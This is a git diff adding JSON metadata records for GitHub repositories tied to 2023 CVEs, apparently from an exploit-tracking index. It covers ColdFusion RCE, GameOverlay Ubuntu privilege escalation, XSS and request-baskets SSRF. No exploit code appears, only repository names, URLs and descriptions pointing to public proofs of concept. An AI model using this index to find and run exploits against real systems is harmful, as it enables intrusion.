"CVE-2023-26360-adobe-coldfusion-rce-exploit", + "full_name": "jakabakos\/CVE-2023-26360-adobe-coldfusion-rce-exploit", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-26360-adobe-coldfusion-rce-exploit", + "description": null, + "fork": false, + "created_at": "2024-05-14T11:22:35Z", + "updated_at": "2024-11-28T02:23:56Z", + "pushed_at": "2024-05-14T13:37:00Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851551513, + "name": "ColdFusion_EXp", + "full_name": "CuriousLearnerDev\/ColdFusion_EXp", + "owner": { + "login": "CuriousLearnerDev", + "id": 72000175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72000175?v=4", + "html_url": "https:\/\/github.com\/CuriousLearnerDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CuriousLearnerDev\/ColdFusion_EXp", + "description": " Adobe ColdFusion CVE-2023-26360\/CVE-2023-29298 自动化实现反弹", + "fork": false, + "created_at": "2024-09-03T09:53:57Z", + "updated_at": "2024-09-03T12:41:47Z", + "pushed_at": "2024-09-03T12:41:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 894070708, + "name": "CVE-2023-26360", + "full_name": "issamjr\/CVE-2023-26360", + "owner": { + "login": "issamjr", + "id": 101994309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101994309?v=4", + "html_url": "https:\/\/github.com\/issamjr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/issamjr\/CVE-2023-26360", + "description": "CVE-2023-26360 - Adobe Coldfusion ", + "fork": false, + "created_at": "2024-11-25T17:42:20Z", + "updated_at": "2024-11-25T17:58:30Z", + "pushed_at": "2024-11-25T17:58:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2640.json b/2023/CVE-2023-2640.json new file mode 100644 index 0000000000..4e41f4fbc1 --- /dev/null +++ b/2023/CVE-2023-2640.json @@ -0,0 +1,219 @@ +[ + { + "id": 678951072, + "name": "gameoverlay", + "full_name": "OllaPapito\/gameoverlay", + "owner": { + "login": "OllaPapito", + "id": 95946350, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95946350?v=4", + "html_url": "https:\/\/github.com\/OllaPapito", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OllaPapito\/gameoverlay", + "description": "CVE-2023-2640 CVE-2023-32629", + "fork": false, + "created_at": "2023-08-15T19:07:02Z", + "updated_at": "2024-10-07T19:39:44Z", + "pushed_at": "2023-08-15T19:49:07Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 692901270, + "name": "GameOverlayFS", + "full_name": "luanoliveira350\/GameOverlayFS", + "owner": { + "login": "luanoliveira350", + "id": 11656264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11656264?v=4", + "html_url": "https:\/\/github.com\/luanoliveira350", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/luanoliveira350\/GameOverlayFS", + "description": "GameoverlayFS (CVE-2023-2640 and CVE-2023-32629) exploit in Shell Script tested on Ubuntu 20.04 Kernel 5.4.0", + "fork": false, + "created_at": "2023-09-17T23:17:22Z", + "updated_at": "2024-10-07T19:40:07Z", + "pushed_at": "2023-09-17T23:38:32Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 702722845, + "name": "CVE-2023-2640-CVE-2023-32629", + "full_name": "g1vi\/CVE-2023-2640-CVE-2023-32629", + "owner": { + "login": "g1vi", + "id": 120142960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120142960?v=4", + "html_url": "https:\/\/github.com\/g1vi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g1vi\/CVE-2023-2640-CVE-2023-32629", + "description": "GameOver(lay) Ubuntu Privilege Escalation", + "fork": false, + "created_at": "2023-10-09T22:02:42Z", + "updated_at": "2024-11-17T18:13:18Z", + "pushed_at": "2023-10-09T22:44:21Z", + "stargazers_count": 118, + "watchers_count": 118, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 118, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 713583056, + "name": "CVE-2023-2640-CVE-2023-32629", + "full_name": "musorblyat\/CVE-2023-2640-CVE-2023-32629", + "owner": { + "login": "musorblyat", + "id": 131186350, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131186350?v=4", + "html_url": "https:\/\/github.com\/musorblyat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/musorblyat\/CVE-2023-2640-CVE-2023-32629", + "description": null, + "fork": false, + "created_at": "2023-11-02T20:19:57Z", + "updated_at": "2024-10-07T19:44:01Z", + "pushed_at": "2023-11-02T20:23:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 765277718, + "name": "Ubuntu-GameOver-Lay", + "full_name": "SanjayRagavendar\/Ubuntu-GameOver-Lay", + "owner": { + "login": "SanjayRagavendar", + "id": 91368803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91368803?v=4", + "html_url": "https:\/\/github.com\/SanjayRagavendar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SanjayRagavendar\/Ubuntu-GameOver-Lay", + "description": "Escalating Privilege using CVE-2023-2640 CVE-2023-3262 ", + "fork": false, + "created_at": "2024-02-29T16:04:58Z", + "updated_at": "2024-03-05T05:47:31Z", + "pushed_at": "2024-03-02T00:29:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 774642539, + "name": "CVE-2023-2640-CVE-2023-32629", + "full_name": "Nkipohcs\/CVE-2023-2640-CVE-2023-32629", + "owner": { + "login": "Nkipohcs", + "id": 117274957, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117274957?v=4", + "html_url": "https:\/\/github.com\/Nkipohcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nkipohcs\/CVE-2023-2640-CVE-2023-32629", + "description": null, + "fork": false, + "created_at": "2024-03-19T22:56:24Z", + "updated_at": "2024-10-07T19:43:00Z", + "pushed_at": "2024-03-19T23:26:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804086046, + "name": "CVE-2023-2640-32629", + "full_name": "K5LK\/CVE-2023-2640-32629", + "owner": { + "login": "K5LK", + "id": 97132966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97132966?v=4", + "html_url": "https:\/\/github.com\/K5LK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K5LK\/CVE-2023-2640-32629", + "description": null, + "fork": false, + "created_at": "2024-05-21T23:39:02Z", + "updated_at": "2024-10-07T19:44:01Z", + "pushed_at": "2024-05-22T18:38:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26469.json b/2023/CVE-2023-26469.json new file mode 100644 index 0000000000..d1b84536f3 --- /dev/null +++ b/2023/CVE-2023-26469.json @@ -0,0 +1,33 @@ +[ + { + "id": 685910808, + "name": "CVE-2023-26469", + "full_name": "d0rb\/CVE-2023-26469", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-26469", + "description": "CVE-2023-26469 REC PoC", + "fork": false, + "created_at": "2023-09-01T09:41:32Z", + "updated_at": "2024-06-21T00:11:29Z", + "pushed_at": "2023-09-01T09:46:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2650.json b/2023/CVE-2023-2650.json new file mode 100644 index 0000000000..5d752c8633 --- /dev/null +++ b/2023/CVE-2023-2650.json @@ -0,0 +1,33 @@ +[ + { + "id": 649814822, + "name": "OpenSSL_1.1.1g_CVE-2023-2650", + "full_name": "hshivhare67\/OpenSSL_1.1.1g_CVE-2023-2650", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/OpenSSL_1.1.1g_CVE-2023-2650", + "description": null, + "fork": false, + "created_at": "2023-06-05T17:40:59Z", + "updated_at": "2023-06-05T17:57:48Z", + "pushed_at": "2023-06-05T18:01:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26563.json b/2023/CVE-2023-26563.json new file mode 100644 index 0000000000..00a46fbbcf --- /dev/null +++ b/2023/CVE-2023-26563.json @@ -0,0 +1,33 @@ +[ + { + "id": 651913949, + "name": "CVE-2023-26563-26564-26565", + "full_name": "RupturaInfoSec\/CVE-2023-26563-26564-26565", + "owner": { + "login": "RupturaInfoSec", + "id": 85564448, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85564448?v=4", + "html_url": "https:\/\/github.com\/RupturaInfoSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RupturaInfoSec\/CVE-2023-26563-26564-26565", + "description": null, + "fork": false, + "created_at": "2023-06-10T13:33:33Z", + "updated_at": "2023-06-14T10:45:37Z", + "pushed_at": "2023-06-29T20:43:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26602.json b/2023/CVE-2023-26602.json new file mode 100644 index 0000000000..b5d91f0578 --- /dev/null +++ b/2023/CVE-2023-26602.json @@ -0,0 +1,33 @@ +[ + { + "id": 744065657, + "name": "CVE-2023-26602", + "full_name": "D1G17\/CVE-2023-26602", + "owner": { + "login": "D1G17", + "id": 156820616, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156820616?v=4", + "html_url": "https:\/\/github.com\/D1G17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D1G17\/CVE-2023-26602", + "description": "Exploit information for CVE-2023-26602 ", + "fork": false, + "created_at": "2024-01-16T15:01:33Z", + "updated_at": "2024-01-16T15:01:33Z", + "pushed_at": "2024-01-16T15:04:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26607.json b/2023/CVE-2023-26607.json new file mode 100644 index 0000000000..5fae88079b --- /dev/null +++ b/2023/CVE-2023-26607.json @@ -0,0 +1,33 @@ +[ + { + "id": 691911118, + "name": "linux-4.1.15_CVE-2023-26607", + "full_name": "Trinadh465\/linux-4.1.15_CVE-2023-26607", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2023-26607", + "description": null, + "fork": false, + "created_at": "2023-09-15T06:42:36Z", + "updated_at": "2023-09-15T06:47:20Z", + "pushed_at": "2023-09-15T08:37:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26609.json b/2023/CVE-2023-26609.json new file mode 100644 index 0000000000..38f20643a5 --- /dev/null +++ b/2023/CVE-2023-26609.json @@ -0,0 +1,33 @@ +[ + { + "id": 744066325, + "name": "CVE-2023-26609", + "full_name": "D1G17\/CVE-2023-26609", + "owner": { + "login": "D1G17", + "id": 156820616, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156820616?v=4", + "html_url": "https:\/\/github.com\/D1G17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D1G17\/CVE-2023-26609", + "description": "Exploit information for CVE-2023-26609 ", + "fork": false, + "created_at": "2024-01-16T15:02:39Z", + "updated_at": "2024-01-16T15:02:40Z", + "pushed_at": "2024-01-16T15:05:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26692.json b/2023/CVE-2023-26692.json new file mode 100644 index 0000000000..93033374b8 --- /dev/null +++ b/2023/CVE-2023-26692.json @@ -0,0 +1,33 @@ +[ + { + "id": 621357031, + "name": "CVE-2023-26692", + "full_name": "bigzooooz\/CVE-2023-26692", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2023-26692", + "description": "ZCBS\/ZBBS\/ZPBS v4.14k - Reflected XSS", + "fork": false, + "created_at": "2023-03-30T13:56:24Z", + "updated_at": "2023-03-30T14:33:20Z", + "pushed_at": "2023-03-30T14:29:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26785.json b/2023/CVE-2023-26785.json new file mode 100644 index 0000000000..0ceb3439b3 --- /dev/null +++ b/2023/CVE-2023-26785.json @@ -0,0 +1,33 @@ +[ + { + "id": 851466770, + "name": "CVE-2023-26785", + "full_name": "Ant1sec-ops\/CVE-2023-26785", + "owner": { + "login": "Ant1sec-ops", + "id": 98224710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98224710?v=4", + "html_url": "https:\/\/github.com\/Ant1sec-ops", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ant1sec-ops\/CVE-2023-26785", + "description": "Authenticated Code execution", + "fork": false, + "created_at": "2024-09-03T06:38:33Z", + "updated_at": "2024-10-21T13:17:46Z", + "pushed_at": "2024-10-18T05:20:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26818.json b/2023/CVE-2023-26818.json new file mode 100644 index 0000000000..3d02b5d4df --- /dev/null +++ b/2023/CVE-2023-26818.json @@ -0,0 +1,33 @@ +[ + { + "id": 685061399, + "name": "CVE-2023-26818", + "full_name": "Zeyad-Azima\/CVE-2023-26818", + "owner": { + "login": "Zeyad-Azima", + "id": 62406753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62406753?v=4", + "html_url": "https:\/\/github.com\/Zeyad-Azima", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zeyad-Azima\/CVE-2023-26818", + "description": "CVE-2023-26818 Exploit MacOS TCC Bypass W\/ Telegram", + "fork": false, + "created_at": "2023-08-30T12:40:50Z", + "updated_at": "2024-08-25T03:35:07Z", + "pushed_at": "2024-06-06T20:14:42Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 17, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26852.json b/2023/CVE-2023-26852.json new file mode 100644 index 0000000000..feb5183ce2 --- /dev/null +++ b/2023/CVE-2023-26852.json @@ -0,0 +1,33 @@ +[ + { + "id": 626287396, + "name": "CVE-2023-26852-Textpattern-v4.8.8-and-", + "full_name": "leekenghwa\/CVE-2023-26852-Textpattern-v4.8.8-and-", + "owner": { + "login": "leekenghwa", + "id": 45155253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45155253?v=4", + "html_url": "https:\/\/github.com\/leekenghwa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leekenghwa\/CVE-2023-26852-Textpattern-v4.8.8-and-", + "description": "Textpattern v4.8.8 and Below are vulnerable to Unrestricted File Upload Leading to Remote Code Execution", + "fork": false, + "created_at": "2023-04-11T07:00:04Z", + "updated_at": "2023-04-11T07:00:04Z", + "pushed_at": "2023-04-12T03:29:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26866.json b/2023/CVE-2023-26866.json new file mode 100644 index 0000000000..280aac58c7 --- /dev/null +++ b/2023/CVE-2023-26866.json @@ -0,0 +1,33 @@ +[ + { + "id": 622352794, + "name": "CVE-2023-26866", + "full_name": "lionelmusonza\/CVE-2023-26866", + "owner": { + "login": "lionelmusonza", + "id": 20681955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20681955?v=4", + "html_url": "https:\/\/github.com\/lionelmusonza", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lionelmusonza\/CVE-2023-26866", + "description": null, + "fork": false, + "created_at": "2023-04-01T21:19:05Z", + "updated_at": "2023-04-01T21:19:05Z", + "pushed_at": "2023-04-01T21:28:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26976.json b/2023/CVE-2023-26976.json new file mode 100644 index 0000000000..303721704b --- /dev/null +++ b/2023/CVE-2023-26976.json @@ -0,0 +1,33 @@ +[ + { + "id": 626381488, + "name": "CVE-2023-26976_tenda_AC6_stack_overflow", + "full_name": "FzBacon\/CVE-2023-26976_tenda_AC6_stack_overflow", + "owner": { + "login": "FzBacon", + "id": 48304150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48304150?v=4", + "html_url": "https:\/\/github.com\/FzBacon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FzBacon\/CVE-2023-26976_tenda_AC6_stack_overflow", + "description": null, + "fork": false, + "created_at": "2023-04-11T11:02:48Z", + "updated_at": "2023-04-18T05:24:22Z", + "pushed_at": "2023-10-20T08:08:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26982.json b/2023/CVE-2023-26982.json new file mode 100644 index 0000000000..82f99112ed --- /dev/null +++ b/2023/CVE-2023-26982.json @@ -0,0 +1,64 @@ +[ + { + "id": 602073215, + "name": "CVE-2023-26982", + "full_name": "bypazs\/CVE-2023-26982", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2023-26982", + "description": "Trudesk v1.2.6 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Tags parameter under the Create Ticket function.", + "fork": false, + "created_at": "2023-02-15T12:49:38Z", + "updated_at": "2023-03-29T02:01:52Z", + "pushed_at": "2023-03-29T02:15:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 602123461, + "name": "Duplicate-of-CVE-2023-26982", + "full_name": "bypazs\/Duplicate-of-CVE-2023-26982", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/Duplicate-of-CVE-2023-26982", + "description": "Trudesk version 1.2.6 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the tickets `Create\/Modify Ticket Tags` on admin role.", + "fork": false, + "created_at": "2023-02-15T14:46:44Z", + "updated_at": "2023-03-29T02:04:12Z", + "pushed_at": "2023-02-15T14:52:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26984.json b/2023/CVE-2023-26984.json new file mode 100644 index 0000000000..d7bc4737a1 --- /dev/null +++ b/2023/CVE-2023-26984.json @@ -0,0 +1,33 @@ +[ + { + "id": 606815438, + "name": "CVE-2023-26984", + "full_name": "bypazs\/CVE-2023-26984", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2023-26984", + "description": "An issue in the password reset function of Peppermint v0.2.4 allows attackers to access the emails and passwords of the Tickets page via a crafted request.", + "fork": false, + "created_at": "2023-02-26T16:45:50Z", + "updated_at": "2023-03-29T02:08:33Z", + "pushed_at": "2023-03-29T02:15:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27035.json b/2023/CVE-2023-27035.json new file mode 100644 index 0000000000..ee8a04bb2e --- /dev/null +++ b/2023/CVE-2023-27035.json @@ -0,0 +1,33 @@ +[ + { + "id": 634566047, + "name": "CVE-2023-27035", + "full_name": "fivex3\/CVE-2023-27035", + "owner": { + "login": "fivex3", + "id": 125558903, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125558903?v=4", + "html_url": "https:\/\/github.com\/fivex3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fivex3\/CVE-2023-27035", + "description": null, + "fork": false, + "created_at": "2023-04-30T14:52:21Z", + "updated_at": "2023-07-01T06:32:21Z", + "pushed_at": "2023-04-30T14:53:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27100.json b/2023/CVE-2023-27100.json new file mode 100644 index 0000000000..cdc5035acc --- /dev/null +++ b/2023/CVE-2023-27100.json @@ -0,0 +1,64 @@ +[ + { + "id": 624761642, + "name": "CVE-2023-27100", + "full_name": "DarokNET\/CVE-2023-27100", + "owner": { + "login": "DarokNET", + "id": 61823580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61823580?v=4", + "html_url": "https:\/\/github.com\/DarokNET", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DarokNET\/CVE-2023-27100", + "description": null, + "fork": false, + "created_at": "2023-04-07T07:38:48Z", + "updated_at": "2023-04-28T12:33:35Z", + "pushed_at": "2023-04-07T09:14:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803311875, + "name": "CVE-2023-27100", + "full_name": "fabdotnet\/CVE-2023-27100", + "owner": { + "login": "fabdotnet", + "id": 169522306, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169522306?v=4", + "html_url": "https:\/\/github.com\/fabdotnet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fabdotnet\/CVE-2023-27100", + "description": null, + "fork": false, + "created_at": "2024-05-20T13:35:39Z", + "updated_at": "2024-05-20T13:37:25Z", + "pushed_at": "2024-05-20T13:37:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27163.json b/2023/CVE-2023-27163.json new file mode 100644 index 0000000000..2471c337a8 --- /dev/null +++ b/2023/CVE-2023-27163.json @@ -0,0 +1,544 @@ +[ + { + "id": 665224442, + "name": "CVE-2023-27163", + "full_name": "entr0pie\/CVE-2023-27163", + "owner": { + "login": "entr0pie", + "id": 73120825, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73120825?v=4", + "html_url": "https:\/\/github.com\/entr0pie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/entr0pie\/CVE-2023-27163", + "description": "Proof-of-Concept for Server Side Request Forgery (SSRF) in request-baskets (<= v.1.2.1)", + "fork": false, + "created_at": "2023-07-11T18:08:05Z", + "updated_at": "2024-08-29T18:36:19Z", + "pushed_at": "2023-08-09T15:11:09Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cybersecurity", + "exploit", + "go", + "golang", + "poc", + "python3", + "request-baskets", + "server-side-request-forgery", + "ssrf" + ], + "visibility": "public", + "forks": 5, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 668120487, + "name": "cve-2023-27163", + "full_name": "seanrdev\/cve-2023-27163", + "owner": { + "login": "seanrdev", + "id": 20375619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20375619?v=4", + "html_url": "https:\/\/github.com\/seanrdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seanrdev\/cve-2023-27163", + "description": "To assist in enumerating the webserver behind the webserver SSRF 